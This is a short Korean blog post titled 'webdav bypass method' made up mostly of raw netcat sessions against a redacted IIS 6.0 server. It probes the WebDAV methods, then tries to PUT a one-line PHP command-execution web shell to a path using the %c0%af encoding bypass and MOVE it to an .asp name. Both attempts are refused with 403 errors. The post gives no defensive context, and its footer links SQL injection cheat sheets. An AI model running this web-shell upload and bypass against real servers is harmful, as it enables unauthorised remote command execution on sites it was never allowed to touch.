annyoung

webdav bypass method 본문

webdav bypass method

nopsled 2015. 1. 6. 11:49



C:\Users\NPKI>nc www.xxxxxxx.com 80

OPTIONS / HTTP/1.1

Host: www.xxxxxxx.com 


Date: Tue, 06 Jan 2015 02:34:36 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

MS-Author-Via: DAV

Content-Length: 0

Accept-Ranges: none

DASL: <DAV:sql>

DAV: 1, 2

Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIN

D, PROPPATCH, LOCK, UNLOCK, SEARCH

Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK

Cache-Control: private 



C:\Users\NPKI>nc www.xxxxxxx.com 80

PUT /images%c0%af/test.txt HTTP/1.1

Host: www.xxxxxxx.com

Content-Type: text/xml; charset="utf-8"

Connection:close

Content-Length: 30


<?php

system($_GET['cmd']);

?>


HTTP/1.1 403 Forbidden

Content-Length: 1358

Content-Type: text/html

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Tue, 06 Jan 2015 02:45:47 GMT

Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/st

rict.dtd">

<HTML><HEAD><TITLE>이 페이지를 저장할 수 없습니다.</TITLE>

<META HTTP-EQUIV="Content-Type" Content="text/html; charset=ks_c_5601-1987">

<STYLE type="text/css">

  BODY { font: 9pt/12pt 굴림 }

  H1 { font: 13pt/15pt 굴림 }

  H2 { font: 9pt/12pt 굴림 }

  A:link { color: red }

  A:visited { color: maroon }

</STYLE>

</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>


<h1>이 페이지를 저장할 수 없습니다.</h1>

웹 사이트에 페이지를 저장하는 데 문제가 있습니다. 쓰기 권한이 허용되지 않는 디렉

터리에서 파일을 수정하거나 파일을 업로드하려고 하면 이러한 오류가 발생할 수 있습

니다.

<hr>

<p>다음을 시도하십시오.</p>

<ul>

<li>이 디렉터리에 대한 쓰기 권한을 갖고 있는 경우 웹 사이트 관리자에게 문의하십

시오.</li>

</ul>

<h2>HTTP 오류 403.3 - 거부됨: 쓰기 권한이 거부되었습니다.<br>IIS(인터넷 정보 서

비스)</h2>

<hr>

<p>기술 정보(지원 인력용)</p>

<ul>

<li><a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft 고객기술지원

부</a>로 이동하여 <b>HTTP</b>와 <b>403</b>이라는 단어로 제목을 검색하십시오.</li

>

<li>IIS 관리자(inetmgr)에서 액세스할 수 있는 <b>IIS 도움말</b>을 열어 <b>가상 디

렉터리 사용</b>, <b>기본 웹 사이트 설정 변경</b> 및 <b>사용자 지정 오류 메시지</

b> 항목을 검색하십시오.</li>

</ul>


</TD></TR></TABLE></BODY></HTML>



MOVE /images%c0%af/test.txt HTTP/1.1

Host: www.xxxxxxx.com

Connection:close

Destination: /images%c0%af/racle.asp


HTTP/1.1 403 Forbidden

Connection: close

Date: Tue, 06 Jan 2015 02:46:38 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Type: text/html

Content-Length: 44


<body><h2>HTTP/1.1 403 Forbidden</h2></body>



'' 카테고리의 다른 글

AWS 문의를 통해 계정 찾기  (0) 2020.08.25
IIS, Webdav 침해사고 당하는 이유중 하나  (0) 2015.11.25
Web Exploit Tool Kit.pdf  (2) 2014.03.18
MSSQL SQL injection cheat sheet  (0) 2014.03.13
MySQL SQL injection cheat sheet  (0) 2014.03.12
Comments